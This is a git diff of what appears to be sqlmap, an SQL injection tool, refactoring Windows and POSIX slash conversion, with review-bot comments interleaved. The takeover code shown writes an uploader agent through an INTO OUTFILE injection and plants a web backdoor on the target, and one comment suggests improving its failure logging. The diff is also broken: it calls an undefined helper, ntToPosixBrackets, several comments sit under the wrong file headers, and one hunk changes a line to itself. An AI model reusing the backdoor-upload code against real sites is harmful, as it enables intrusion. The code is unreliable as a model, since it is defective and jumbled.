diff --git a/lib/core/common.py b/lib/core/common.py
index 46ecdfb8f..625ca097d 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -236,15 +236,15 @@ def getDocRoot():
 absFilePathWin = None
 if isWindowsPath(absFilePath):
- absFilePathWin = absFilePath.replace("/", "\\")
- absFilePath = absFilePath[2:].replace("\\", "/")
+ absFilePathWin = posixToNtSlashes(absFilePath)
+ absFilePath = ntToPosixSlashes(absFilePath[2:])
 if pagePath in absFilePath:
 index = absFilePath.index(pagePath)
 docRoot = absFilePath[:index]
 if absFilePathWin:
- docRoot = "C:/%s" % docRoot.replace("\\", "/")
+ docRoot = "C:/%s" % ntToPosixSlashes(docRoot)
 docRoot = normalizePath(docRoot)
 break
@@ -908,3 +908,9 @@ def decloakToMkstemp(filepath, **kwargs):
 def isWindowsPath(filepath):
 return re.search("\A[A-Za-z]:", filepath) is not None
+
+def posixToNtSlashes(filepath):
+ return filepath.replace('/', '\\')
+
+def ntToPosixSlashes(filepath):
+ return filepath.replace('\\', '/')
diff --git a/lib/core/option.py b/lib/core/option.py
index 2e658bf64..bd83149c6 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -35,6 +35,7 @@ import urlparse
 from ConfigParser import ConfigParser
 from lib.core.common import getFileType
+from lib.core.common import ntToPosixSlashes
 from lib.core.common import parseTargetUrl
 from lib.core.common import paths
 from lib.core.common import randomRange
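Review bot: The drive letter is lost on the Windows branch of getDocRoot: `absFilePath[2:]` strips it and the later `docRoot = "C:/%s" % ntToPosixSlashes(docRoot)` hard-codes `C:`, so a document root on any other drive is reconstructed wrongly. The real prefix is still available in `absFilePathWin`, so `docRoot = "%s/%s" % (absFilePathWin[:2], ntToPosixSlashes(docRoot))` keeps it. getDocRoot starts before the hunk and appears to continue past it.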
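Review bot: The two new helpers `posixToNtSlashes` and `ntToPosixSlashes` carry no docstring, and since the rest of the commit makes them the single place slash conversion happens, it is worth stating that each is a plain character swap with no normalization, drive-letter or UNC handling: `"""Replace every '/' in filepath with '\\'; a bare character swap, no path normalization."""` and the mirror text for the other. A one-line docstring on `isWindowsPath` saying it only tests for a leading drive letter (`\A[A-Za-z]:`) would help callers that combine the three.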
@@ -903,19 +904,19 @@ def __cleanupOptions():
 conf.delay = float(conf.delay)
 if conf.rFile:
- conf.rFile = os.path.normpath(conf.rFile.replace("\\", "/"))
+ conf.rFile = os.path.normpath(ntToPosixSlashes(conf.rFile))
 if conf.wFile:
- conf.wFile = os.path.normpath(conf.wFile.replace("\\", "/"))
+ conf.wFile = os.path.normpath(ntToPosixSlashes(conf.wFile))
 if conf.dFile:
- conf.dFile = os.path.normpath(conf.dFile.replace("\\", "/"))
+ conf.dFile = os.path.normpath(ntToPosixSlashes(conf.dFile))
 if conf.msfPath:
- conf.msfPath = os.path.normpath(conf.msfPath.replace("\\", "/"))
+ conf.msfPath = os.path.normpath(ntToPosixSlashes(conf.msfPath))
 if conf.tmpPath:
- conf.tmpPath = os.path.normpath(conf.tmpPath.replace("\\", "/"))
+ conf.tmpPath = os.path.normpath(ntToPosixSlashes(conf.tmpPath))
 if conf.googleDork or conf.list:
 conf.multipleTargets = True
diff --git a/lib/request/basic.py b/lib/request/basic.py
index 0d74849c8..1e00ec5f5 100644
--- a/lib/request/basic.py
+++ b/lib/request/basic.py
@@ -30,6 +30,7 @@ import zlib
 from lib.core.common import directoryPath
 from lib.core.common import isWindowsPath
+from lib.core.common import posixToNtSlashes
 from lib.core.common import urlEncodeCookieValues
 from lib.core.data import conf
 from lib.core.data import kb
@@ -83,7 +84,7 @@ def parseResponse(page, headers):
 absFilePath = match.group("result").strip()
 page = page.replace(absFilePath, "")
 if isWindowsPath(absFilePath):
- absFilePath = absFilePath.replace("/", "\\")
+ absFilePath = posixToNtSlashes(absFilePath)
 if absFilePath not in kb.absFilePaths:
 kb.absFilePaths.add(absFilePath)
diff --git a/lib/takeover/web.py b/lib/takeover/web.py
index 7f94bb864..eaae35597 100644
--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
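Review bot: `os.path.normpath` follows the host's own path rules, so on a Windows sqlmap host it turns the forward slashes that `ntToPosixSlashes` just produced straight back into backslashes, undoing the conversion for every one of the five options. For the values that appear to name paths on the remote system (rFile, dFile, tmpPath and msfPath are used that way elsewhere in this diff; wFile is opened locally in mssqlserver.py) `posixpath.normpath(ntToPosixSlashes(conf.rFile))` gives a host-independent result. The same normpath-after-conversion pattern appears in the misc.py @@ -65 hunk and the mysql.py @@ -496 hunk. The five identical `if conf.X:` blocks could also be one loop over the attribute names. __cleanupOptions continues past the hunk.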
@@ -31,8 +31,10 @@ from lib.core.common import decloakToNamedTemporaryFile
 from lib.core.common import fileToStr
 from lib.core.common import getDirs
 from lib.core.common import getDocRoot
+from lib.core.common import ntToPosixSlashes
 from lib.core.common import isWindowsPath
 from lib.core.common import normalizePath
+from lib.core.common import posixToNtSlashes
 from lib.core.common import readInput
 from lib.core.convert import hexencode
 from lib.core.data import conf
@@ -90,6 +92,7 @@ class Web:
 "file": stream,
 "uploadDir": directory,
 }
+
 page = Request.getPage(url=self.webUploaderUrl, multipart=multipartParams)
 if "File uploaded" not in page:
@@ -174,7 +177,7 @@ class Web:
 for directory in directories:
 # Upload the uploader agent
 outFile = normalizePath("%s/%s" % (directory, uploaderName))
- uplQuery = uploaderContent.replace("WRITABLE_DIR", directory)
+ uplQuery = uploaderContent.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if kb.os == "Windows" else directory)
 query = " LIMIT 1 INTO OUTFILE '%s' " % outFile
 query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
 query = agent.prefixQuery(" %s" % query)
@@ -182,13 +185,13 @@ class Web:
 payload = agent.payload(newValue=query)
 page = Request.queryPage(payload)
- requestDir = directory.replace('\\', '/').replace(kb.docRoot.replace('\\', '/'), "/").replace("//", "/")
+ requestDir = ntToPosixSlashes(directory).replace(ntToPosixBrackets(kb.docRoot), "/").replace("//", "/")
 if isWindowsPath(requestDir):
 requestDir = requestDir[2:]
 requestDir = normalizePath(requestDir)
 self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, requestDir)
 self.webUploaderUrl = "%s/%s" % (self.webBaseUrl, uploaderName)
- self.webUploaderUrl = self.webUploaderUrl.replace("./", "/").replace("\\", "/")
+ self.webUploaderUrl = ntToPosixSlashes(self.webUploaderUrl.replace("./", "/"))
 uplPage, _ = Request.getPage(url=self.webUploaderUrl, direct=True, raise404=False)
 if "sqlmap file uploader" not in uplPage:
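Review bot: The new `uplQuery` line buries a second, hand-rolled slash conversion (`directory.replace('/', '\\\\')`) inside a conditional expression while the rest of the commit routes every conversion through `posixToNtSlashes`, and the reader is left to guess why the backslash is doubled here. If the doubling is deliberate because the value is substituted into the uploader's text, that belongs in a named variable with a comment: `# doubled on purpose: the value is substituted into uploaderContent, where a single '\\' would be consumed`, then `writableDir = directory.replace('/', '\\\\') if kb.os == "Windows" else directory` and `uplQuery = uploaderContent.replace("WRITABLE_DIR", writableDir)`. The enclosing method starts before and ends after the hunk.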
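Review bot: The new `requestDir` line calls `ntToPosixBrackets`, a name that is neither defined in the common.py hunk (which adds only `posixToNtSlashes` and `ntToPosixSlashes`) nor imported in web.py's @@ -31 hunk, so unless it exists elsewhere in the repository this line raises NameError the first time a directory is processed. It looks like a typo for the helper used on the same line: `requestDir = ntToPosixSlashes(directory).replace(ntToPosixSlashes(kb.docRoot), "/").replace("//", "/")`. The enclosing method starts before and ends after the hunk.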
@@ -201,18 +204,16 @@ class Web:
 infoMsg = "the uploader agent has been successfully uploaded "
 infoMsg += "on '%s'" % directory
 logger.info(infoMsg)
-
+
+ if kb.os == "Windows":
+ directory = posixToNtSlashes(directory)
+
 if self.__webFileStreamUpload(backdoorStream, backdoorName, directory):
 self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
 self.webDirectory = directory
-
 infoMsg = "the backdoor has probably been successfully "
 infoMsg += "uploaded on '%s', go with your browser " % directory
 infoMsg += "to '%s' and enjoy it!" % self.webBackdoorUrl
 logger.info(infoMsg)
- else:
- infoMsg = "the backdoor hasn't been successfully "
- infoMsg += "uploaded on '%s'" % directory
- logger.warn(infoMsg)
 break
diff --git a/plugins/dbms/mssqlserver.py b/plugins/dbms/mssqlserver.py
index 6422fbf44..1c12195d5 100644
--- a/plugins/dbms/mssqlserver.py
+++ b/plugins/dbms/mssqlserver.py
@@ -31,6 +31,7 @@ from lib.core.common import formatDBMSfp
 from lib.core.common import formatFingerprint
 from lib.core.common import getHtmlErrorFp
 from lib.core.common import getRange
+from lib.core.common import posixToNtSlashes
 from lib.core.common import randomInt
 from lib.core.common import randomStr
 from lib.core.convert import urlencode
@@ -496,9 +497,9 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeov
 logger.debug(debugMsg)
 debugSize = 0xFF00
- tmpPath = conf.tmpPath.replace("/", "\\")
+ tmpPath = posixToNtSlashes(conf.tmpPath)
 dFileName = os.path.split(dFile)[1]
- dFile = dFile.replace("/", "\\")
+ dFile = posixToNtSlashes(dFile)
 wFileSize = os.path.getsize(wFile)
 wFilePointer = open(wFile, "rb")
 wFileContent = wFilePointer.read()
diff --git a/plugins/dbms/mysql.py b/plugins/dbms/mysql.py
index 72587692c..98c46aaaa 100644
--- a/plugins/dbms/mysql.py
+++ b/plugins/dbms/mysql.py
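Review bot: A failed `__webFileStreamUpload` is now silent: the `else` branch that logged a warning was removed, so when the stream upload returns false the loop still `break`s and the user sees only the earlier "uploader agent ... uploaded" message, with no hint that `self.webBackdoorUrl` and `self.webDirectory` were never set. Keeping a warning on the failure path costs nothing and makes the later state explicable; the `break` could also be reconsidered so the remaining writable directories are tried, but that is a behavioural change worth a separate decision. The enclosing method starts before the hunk.
```python
if self.__webFileStreamUpload(backdoorStream, backdoorName, directory):
    # … unchanged: webBackdoorUrl / webDirectory bookkeeping and success log …
else:
    warnMsg = "the backdoor hasn't been successfully "
    warnMsg += "uploaded on '%s'" % directory
    logger.warn(warnMsg)
```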
@@ -29,6 +29,7 @@ from lib.core.agent import agent
 from lib.core.common import formatDBMSfp
 from lib.core.common import formatFingerprint
 from lib.core.common import getHtmlErrorFp
+from lib.core.common import ntToPosixSlashes
 from lib.core.common import randomInt
 from lib.core.common import randomStr
 from lib.core.data import conf
@@ -496,7 +497,7 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
 # Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_basedir
 self.__basedir = inject.getValue("SELECT @@basedir")
- self.__basedir = os.path.normpath(self.__basedir.replace("\\", "/"))
+ self.__basedir = os.path.normpath(ntToPosixSlashes(self.__basedir))
 if re.search("^[\w]\:[\/\\\\]+", self.__basedir, re.I):
 kb.os = "Windows"
@@ -517,7 +518,7 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
 # NOTE: specifying the relative path as './udf.dll'
 # saves in @@datadir on both MySQL 4.1 and MySQL 5.0
 self.__datadir = "."
- self.__datadir = os.path.normpath(self.__datadir.replace("\\", "/"))
+ self.__datadir = os.path.normpath(ntToPosixSlashes(self.__datadir))
 if re.search("[\w]\:\/", self.__datadir, re.I):
 kb.os = "Windows"
diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py
index f461651da..154412848 100644
--- a/plugins/generic/misc.py
+++ b/plugins/generic/misc.py
@@ -25,6 +25,8 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
 import os
 import re
+from lib.core.common import ntToPosixSlashes
+from lib.core.common import posixToNtSlashes
 from lib.core.common import readInput
 from lib.core.data import conf
 from lib.core.data import kb
@@ -65,7 +67,7 @@ class Miscellaneous:
 if re.search("^[\w]\:[\/\\\\]+", conf.tmpPath, re.I):
 kb.os = "Windows"
- conf.tmpPath = conf.tmpPath.replace("\\", "/")
+ conf.tmpPath = ntToPosixSlashes(conf.tmpPath)
 conf.tmpPath = os.path.normpath(conf.tmpPath)
 setRemoteTempPath()
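Review bot: The value returned by `inject.getValue("SELECT @@basedir")` is passed straight into `ntToPosixSlashes`, which calls `.replace` on it; if getValue can yield None when the query cannot be answered (I cannot tell from this hunk), the line fails with AttributeError instead of a readable message, so a guard such as `if not self.__basedir: raise sqlmapNoneDataException("unable to retrieve @@basedir")` (or whatever error the file already uses) before the conversion would help. Separately, the drive-letter test `re.search("^[\w]\:[\/\\\\]+", self.__basedir, re.I)` duplicates what `isWindowsPath` in common.py now provides, and the same regex appears in the misc.py @@ -65 hunk; reusing the helper keeps the three detections in step. The enclosing method starts before and ends after the hunk.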
@@ -77,7 +79,7 @@ class Miscellaneous:
 if doubleslash:
 tempFile = tempFile.replace("/", "\\\\")
 else:
- tempFile = posixToNtSlashes(tempFile)
+ tempFile = posixToNtSlashes(tempFile)
 cmd = "del /F /Q %s" % tempFile
 else:
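Review bot: The converted `tempFile` is interpolated unquoted into `cmd = "del /F /Q %s" % tempFile`, so a temporary path containing a space (a common case under Program Files-style directories) is split into two arguments and the cleanup silently fails to remove the file it was meant to remove; `cmd = 'del /F /Q "%s"' % tempFile` keeps the path intact. The `doubleslash` branch still hand-rolls its own conversion with `replace("/", "\\\\")`, so a one-line comment on why that branch cannot use `posixToNtSlashes` would stop the next reader from "fixing" it. The enclosing method starts before the hunk; where `tempFile` originates is not visible here.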